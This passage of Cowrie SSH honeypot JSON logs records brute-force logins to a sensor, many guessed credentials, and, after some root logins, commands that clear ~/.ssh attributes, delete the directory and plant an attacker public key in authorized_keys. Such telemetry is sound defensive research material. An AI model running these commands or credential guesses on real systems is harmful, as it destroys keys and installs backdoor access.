h.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:23.768957Z","src_ip":"212.227.235.229","session":"b3223fd1ac64"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:58:23.947896Z","src_ip":"212.227.235.229","session":"1bd4fa67fb2e"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:24.744944Z","src_ip":"212.227.235.229","session":"e86873423157"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47004,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7dc12a158e6","protocol":"ssh","message":"New connection: 212.227.235.229:47004 (1.2.3.4:22) [session: d7dc12a158e6]","sensor":"my-vps","timestamp":"2025-09-08T21:58:24.814427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:24.815730Z","src_ip":"212.227.235.229","session":"d7dc12a158e6"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"Welcome1","message":"login attempt [odoo/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T21:58:25.051119Z","src_ip":"212.227.235.229","session":"b3223fd1ac64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:25.146008Z","src_ip":"212.227.235.229","session":"d7dc12a158e6"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:26.020578Z","src_ip":"212.227.235.229","session":"1bd4fa67fb2e"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:26.362597Z","src_ip":"212.227.235.229","session":"b3223fd1ac64"}
{"eventid":"cowrie.login.failed","username":"samsung","password":"Password123","message":"login attempt [samsung/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T21:58:26.507919Z","src_ip":"212.227.235.229","session":"d7dc12a158e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44160,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8efe4be32f7","protocol":"ssh","message":"New connection: 212.227.235.229:44160 (1.2.3.4:22) [session: d8efe4be32f7]","sensor":"my-vps","timestamp":"2025-09-08T21:58:27.143640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:27.170686Z","src_ip":"212.227.235.229","session":"d8efe4be32f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:27.380271Z","src_ip":"212.227.235.229","session":"d8efe4be32f7"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:27.839194Z","src_ip":"212.227.235.229","session":"d7dc12a158e6"}
{"eventid":"cowrie.login.failed","username":"proxyuser","password":"12345","message":"login attempt [proxyuser/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T21:58:28.471588Z","src_ip":"212.227.235.229","session":"d8efe4be32f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33682,"dst_ip":"1.2.3.4","dst_port":22,"session":"90b82783fd36","protocol":"ssh","message":"New connection: 212.227.235.229:33682 (1.2.3.4:22) [session: 90b82783fd36]","sensor":"my-vps","timestamp":"2025-09-08T21:58:28.514177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:28.517862Z","src_ip":"212.227.235.229","session":"90b82783fd36"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:29.677804Z","src_ip":"212.227.235.229","session":"d8efe4be32f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44008,"dst_ip":"1.2.3.4","dst_port":22,"session":"432a1b88ba1d","protocol":"ssh","message":"New connection: 212.227.235.229:44008 (1.2.3.4:22) [session: 432a1b88ba1d]","sensor":"my-vps","timestamp":"2025-09-08T21:58:36.162612Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:36.163421Z","src_ip":"212.227.235.229","session":"432a1b88ba1d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:36.494436Z","src_ip":"212.227.235.229","session":"432a1b88ba1d"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer123@","message":"login attempt [root/Qwer123@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:58:37.850741Z","src_ip":"212.227.235.229","session":"432a1b88ba1d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:58:38.557135Z","src_ip":"212.227.235.229","session":"432a1b88ba1d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:58:38.557903Z","src_ip":"212.227.235.229","session":"432a1b88ba1d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:58:38.559291Z","src_ip":"212.227.235.229","session":"432a1b88ba1d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:38.889648Z","src_ip":"212.227.235.229","session":"432a1b88ba1d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:58:39.612599Z","src_ip":"212.227.235.229","session":"432a1b88ba1d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:58:39.613318Z","src_ip":"212.227.235.229","session":"432a1b88ba1d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:58:39.944206Z","src_ip":"212.227.235.229","session":"432a1b88ba1d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:39.945061Z","src_ip":"212.227.235.229","session":"432a1b88ba1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44010,"dst_ip":"1.2.3.4","dst_port":22,"session":"a84338d82dcb","protocol":"ssh","message":"New connection: 212.227.235.229:44010 (1.2.3.4:22) [session: a84338d82dcb]","sensor":"my-vps","timestamp":"2025-09-08T21:58:40.267498Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:40.268212Z","src_ip":"212.227.235.229","session":"a84338d82dcb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:40.597605Z","src_ip":"212.227.235.229","session":"a84338d82dcb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:40.938723Z","src_ip":"212.227.235.229","session":"90b82783fd36"}
{"eventid":"cowrie.session.closed","duration":"12.4","message":"Connection lost after 12.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:40.940559Z","src_ip":"212.227.235.229","session":"90b82783fd36"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:58:41.950686Z","src_ip":"212.227.235.229","session":"a84338d82dcb"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:43.282385Z","src_ip":"212.227.235.229","session":"a84338d82dcb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44012,"dst_ip":"1.2.3.4","dst_port":22,"session":"175a2a66e9ee","protocol":"ssh","message":"New connection: 212.227.235.229:44012 (1.2.3.4:22) [session: 175a2a66e9ee]","sensor":"my-vps","timestamp":"2025-09-08T21:58:43.603864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:43.604803Z","src_ip":"212.227.235.229","session":"175a2a66e9ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:43.929545Z","src_ip":"212.227.235.229","session":"175a2a66e9ee"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:58:45.264157Z","src_ip":"212.227.235.229","session":"175a2a66e9ee"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:45.588552Z","src_ip":"212.227.235.229","session":"175a2a66e9ee"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:45.592953Z","src_ip":"212.227.235.229","session":"432a1b88ba1d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.114.29","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"048947f600cd","protocol":"ssh","message":"New connection: 196.251.114.29:51824 (1.2.3.4:22) [session: 048947f600cd]","sensor":"my-vps","timestamp":"2025-09-08T21:58:46.466656Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:46.498414Z","src_ip":"196.251.114.29","session":"048947f600cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34910,"dst_ip":"1.2.3.4","dst_port":22,"session":"252b20915d36","protocol":"ssh","message":"New connection: 212.227.235.229:34910 (1.2.3.4:22) [session: 252b20915d36]","sensor":"my-vps","timestamp":"2025-09-08T21:58:47.970256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:47.971031Z","src_ip":"212.227.235.229","session":"252b20915d36"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:48.146851Z","src_ip":"212.227.235.229","session":"252b20915d36"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:48.469381Z","src_ip":"212.227.125.160","session":"4261c36a2581"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#$%rdp","message":"login attempt [root/!@#$%rdp] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:58:48.887851Z","src_ip":"212.227.235.229","session":"252b20915d36"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:58:49.257094Z","src_ip":"212.227.235.229","session":"252b20915d36"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:58:49.257782Z","src_ip":"212.227.235.229","session":"252b20915d36"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:58:49.258879Z","src_ip":"212.227.235.229","session":"252b20915d36"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:49.434720Z","src_ip":"212.227.235.229","session":"252b20915d36"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:58:49.893062Z","src_ip":"212.227.235.229","session":"252b20915d36"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:58:49.893759Z","src_ip":"212.227.235.229","session":"252b20915d36"}
